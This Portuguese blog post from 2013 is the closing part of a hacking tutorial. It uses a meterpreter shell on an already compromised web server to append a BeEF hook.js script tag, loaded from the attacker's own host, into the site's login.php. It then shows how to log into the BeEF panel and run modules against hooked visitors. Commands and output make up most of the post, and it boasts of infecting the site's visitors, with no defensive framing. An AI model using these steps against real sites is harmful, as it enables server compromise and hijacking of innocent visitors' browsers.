sexta-feira, 17 de maio de 2013

E ai pessoal!

Hoje vou postar um extra que estava no paper, além de atacar e dominar o site, além de tomar o controle do servidor, vamos agora um pouco mais além. Vamos usar o BeEF (Browser Exploit Framework) para atacar os visitantes que acessam nosso site infectado. E vamos lá!

1. Inicie o beef
root@bt:/pentest/web/beef# ./beef -x -v



2. No site do Metasploit, baixe o plugin do BeEF para o Metasploit no link “https://github.com/xntrik/beefmetasploitplugin.git”


$ cd /pentest/exploits/framework/msf3
$ git clone https://github.com/xntrik/beefmetasploitplugin.git
Initialized empty Git repository in /opt/metasploit/msf3/beefmetasploitplugin/.git/






3. Mova os arquivos beef.rb para msf/plugins e lib/beef para msf/lib


$ root@bt:/pentest/exploits/framework/msf3# mv beefmetasploitplugin/lib/beef lib/
$ root@bt:/pentest/exploits/framework/msf3# mv beefmetasploitplugin/plugins/beef.rb plugins/



4. Instale hpricot,json e gem

$ root@bt:/pentest/exploits/framework/msf3# gem install hpricot json

5. No console do Metasploit, carregue o plugin do BeEF.
msf > load beef




6.Conecte no BeEF
msf > beef_connect
msf > beef_connect http://127.0.0.1:3000 beef beef




7. Neste passo, vamos habilitar para que o script do BeEF seja executado em todos os clientes que acessarem a página. Voltando um pouco para a shell meterpeter no ultimo passo do ataque com o sqlmap, baixe o arquivo login.php e adicione o script "<script src='http://192.168.77.137:3000/hook.js></script>" no arquivo e faça o upload novamente.


meterpreter > download login.php .
[*] downloading: login.php -> ./login.php
[*] downloaded : login.php -> ./login.php




root@bt:~# echo "<script src='http://192.168.77.137:3000/hook.js></script>" >> login.php
meterpreter > upload login.php .
[*] uploading : login.php -> .
[*] uploaded : login.php -> ./login.php meterpreter >

Agora, quando a vitima acessar o site ela vai rodar o script do BeEF.



8. Vá para a interface web de gerenciamento do BeEF (http://127.0.0.1:3000/ui/panel), e logue com o usuário “beef” e senha “beef”:







9. Se alguém visitar a página login.php, ela será atacada pelo BeEF e no seu painel você pode ver a lista dos que já foram atacados.






Se você quiser ver informações detalhadas clique em cima da vítima que as informações serão apresentadas do lado direito da tela.






Estas informações também podem ser vistas no terminal, no console do Metasploit usando o seguinte comando:
msf > beef_online






E para detalhes use o comando:
msf > beef_targetmsf > beef_target -i 0









Após levantarmos todas essas informações vamos utilizar o seguinte comando:


msf > beef_target -c 0 47








Após isso, estaremos usando o Man-in-The-Browser na vítima.




E com isso finalizamos o paper! Aprendemos aqui um método de fazer todo o processo de scan, levantamento de informações, analise de vulnerabilidades e um ataque um tanto quanto elaborado, resultando em um site "ownado", um server em nosso poder e todos, ou boa parte dos visitantes infectados assim que acessarem o site.

Agora é com vocês aprimorar essas técnicas, mas cuidado, conhecimento não é crime, o uso que você pode dar para ele pode ser ;)

Bons estudos!

0 comentários:

Postar um comentário

Subscribe to RSS Feed Follow me on Twitter!